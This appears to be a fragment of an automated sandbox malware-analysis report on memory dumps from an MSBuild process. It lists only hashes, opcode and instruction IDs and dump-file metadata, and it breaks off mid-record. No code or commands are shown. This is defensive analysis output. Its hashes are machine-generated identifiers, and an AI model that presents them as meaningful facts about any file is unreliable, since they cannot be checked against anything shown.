                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7316BB160835A8FCB02EF18D840A5B7BE9FF99758F01056AF851973A1D770DD05CBA2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 252c9760668fac9359fd75097bb46ca1148c613df6b5f510d150d737b2c3401b
                                                                                                                                                                                                                                                                  • Instruction ID: 823c4e2028d151fdabb6b54080fca85aa3d69ed82c816880e185d719a8d7b369
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 252c9760668fac9359fd75097bb46ca1148c613df6b5f510d150d737b2c3401b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E93139B25002019BDB31AF6CDC41B697BB4AF5031CF9581A9ED499B382DA74D986CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                                                  • Instruction ID: 1a0196e25dc9fc4bd34c36b63f4c39303b9b53e67be2196f8df85fab6b8956d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA213036600652B6CF15ABA99C80AFBBBB4EFE4714F40802FFAD597661E634DD40C360
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 384644633c6b9105d23ad1d5fe877f6f99dc4cbfb7167cccaf9d6773d7cc8bc2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6214D309047618BC321DF29844076BBBE9AFF6315F51491EF8A593261CB30988587A1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 74808c18459e4e22cef9b44d533f96e60e22fd6a9a3613efbf6f75537919ae90
                                                                                                                                                                                                                                                                  • Instruction ID: e7e454574c894e0339aa5e5741743fcc35da77f7fe9658a31ee1db9b6258facc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74808c18459e4e22cef9b44d533f96e60e22fd6a9a3613efbf6f75537919ae90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B121A1B25042469BDB12EF6EC844B6BBBDCAF91684F08446ABD80872A1D734DA05C6A1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                                                                                                                                                  • Instruction ID: a007a5db434b7dfc2a80220186f70acc41866c49eb4a9cf480a3f36461ac473f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3321D472644705ABD3119F1CCC45B5BBBA4FF88768F00022EFA499B3A0D734EC0087A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9664a43c64529e1e3eafa1d9b1d90221416f3704f597a6d3270e29902cb44ccc
                                                                                                                                                                                                                                                                  • Instruction ID: 42103be9933f58889269750ac3f0c3d9e050ebe144580639dc09bd4f23980fc6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9664a43c64529e1e3eafa1d9b1d90221416f3704f597a6d3270e29902cb44ccc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4821E4A12042504FD755CF1A88B44B6FFE6EFC662574B81E6E884DF787C934981ACBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e2f8ccb46d7426d42f0f4628f36c04e5e197781fea1c6e951ce1930477a5db01
                                                                                                                                                                                                                                                                  • Instruction ID: 6e0628d85a0397dd86556657cb3042de63d8294e582758db3803f566f9bee87a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2f8ccb46d7426d42f0f4628f36c04e5e197781fea1c6e951ce1930477a5db01
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A216875201A41DBCB29DF29C941B96B7F5AF48B08F24846DA609CBB61E371E842CF94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                                                                                                                                                  • Instruction ID: 9a17db6a00a49595463e2d4283255ad8260ff0f8bb76a7a52023afed60fcf828
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0721F07160479ADFEB228BADC948B217BE9EF54358F0900A1ED459B7D2EB34DC40CA90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6f9dd912068730f79463bb8b6c1441f3b63cd610447f612271772d6ec0993f24
                                                                                                                                                                                                                                                                  • Instruction ID: 203542873b61df3add964c597ad09629d3a3955fb2665e07f590481c5d3a31a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f9dd912068730f79463bb8b6c1441f3b63cd610447f612271772d6ec0993f24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7121A233A104129B9B28CB3CC904476F7E6FFCC32436A427AD516EB664D674B9118684
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 82f090143684e71ed92a1ad5e3735cf790a28ebde6fb7d7423cc144c19e57687
                                                                                                                                                                                                                                                                  • Instruction ID: 178bf7b028b75086faa3bc9baa98c04f6fa2e803a9d69618af0fd92c41add2d9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82f090143684e71ed92a1ad5e3735cf790a28ebde6fb7d7423cc144c19e57687
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 320184B1202E46BBDB11AB7ECD80E57B7ACFB54668701052AB20993561DB24EC01CAA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                                                                                                                  • Instruction ID: f770c701e474a72010774363c33d838fee226477af20aa40e31142058946da25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF118B72410A02DFEB329E19C880B22B7E4BF5077AF15896DE4894A4A6C378E880CB10
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                                                                                                                  • Instruction ID: c78b4541c4343f6e6eb0dd92f4140560cfffb71f1faba6fdad070670ef7ddcfc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5014772E0058C9BDB119B98E840FA577A9EB94A3CF10415AFF158FA81EB34DD00C780
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                                                                                                                  • Instruction ID: cfba64c218b69fc20e23f11001243eb926134efbdf3b7590c392566e97025e11
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C01D136300105EBCB129AAECC40EDB7EACFF85758B144429BA06E7560EA34DD02C760
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 38e55b07c222f32b2608033f5b53f779fb263ab7a125e6f4a8ef8837b443c9a6
                                                                                                                                                                                                                                                                  • Instruction ID: 27e7a55030fb1f857aad11d5d00a0b51f8e60facb6db739c92d2912a894d3433
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38e55b07c222f32b2608033f5b53f779fb263ab7a125e6f4a8ef8837b443c9a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D015E71A00259ABDB14EF69D851FAEBBB8EF44704F00406AB904EB290D674DE05CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 295ab6c67c521fee34781a6f1197323228fb7fddb4f19b4cb95fc1ce9da795e4
                                                                                                                                                                                                                                                                  • Instruction ID: f0e269c45983fe0148a43e169aca8a18d92e3dc0d0c842dfe9846e9f4f2977d2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 295ab6c67c521fee34781a6f1197323228fb7fddb4f19b4cb95fc1ce9da795e4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47019E71A10259ABCB04EF69D841FAEBBB8EF94714F00402AB900EB390D674DE01CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                                                  • Instruction ID: d2fe5fb47ade952552fe3489b6fc97e6fa14ac3b71c8bffa74cc3049b1b5836d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D017C72204584DFE726C61ED948F367BDCEB45798F0904B1F905CBAA1EA38DC40C661
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d1aa86da1760ae8f70724e64352af4037df12a10ed7e4d8c19be73d675c9b487
                                                                                                                                                                                                                                                                  • Instruction ID: 78396714088d593419022e0a9e7163875f9ff0aa7ed3dd84f2f5b4a26c028dbc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1aa86da1760ae8f70724e64352af4037df12a10ed7e4d8c19be73d675c9b487
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53111E70A1024ADFDB44DFA9D551BADBBF4FF08704F04426AE905EB392E634D941CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 08053e07c488375c44a83b7e6d1cec3dda0423f4a0ff234cc965271a963dc7a5
                                                                                                                                                                                                                                                                  • Instruction ID: a377cc2606d64b0e54f3a4ac2e5adfbd5a2b3796093a50bc0d6ba0bcc3c1e232
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08053e07c488375c44a83b7e6d1cec3dda0423f4a0ff234cc965271a963dc7a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF018F71A00249ABCB00DFADD851AEEBBF8FF58714F14405AF901AB390D734EA01CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                                  • Instruction ID: 22029e5da03b307c8fff2d5876c1c61c229a1c03200d802136a82d3cb39945b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F01DB220001DBFEF029F95DD80DAF7B7EEB59298B114129FA1196160D635DD21ABA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a203efc49a3044eea1c9973a35d1472e401d7051d002da8b7c168cfebea297de
                                                                                                                                                                                                                                                                  • Instruction ID: 3bc9502ca49ca2484fad26856e6b8bab26000b8fa6d671aa6e830fbc6e358102
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a203efc49a3044eea1c9973a35d1472e401d7051d002da8b7c168cfebea297de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F0C872F10248ABDB04DFBDC855AEEB7B8EF48714F00805AE501EB290DA74D9058791
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                                                                                                                  • Instruction ID: 168a0ef0dae4de1ac54c732c364e6d59c9772e99479b9227f4f284510371e48e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59F0FC71A013566BEF10D79D8580FEB7BA8DFD0618F084165BF019F981F630D940C750
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4df351057d6b94bc0038454bcde2a7e2660a3f2c82da9984740b7a87a7e5df69
                                                                                                                                                                                                                                                                  • Instruction ID: 4f90e8e67c4a213f8ea7044ab10d1e6bc4013c2b8beb5c773b47461a89fb190b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4df351057d6b94bc0038454bcde2a7e2660a3f2c82da9984740b7a87a7e5df69
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF024723042429BF370961DAC01F22379AE7C4A5DF65903AEB098B6C1F978DC01C394
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f8de1b8fa7958aebc9838ae35d3d703efa4b4c678466c342d410ef8e269ee21d
                                                                                                                                                                                                                                                                  • Instruction ID: ffbd7fdf65a2a62f362fd6d2ff9ac370b51146bd717d1f545500020352f14585
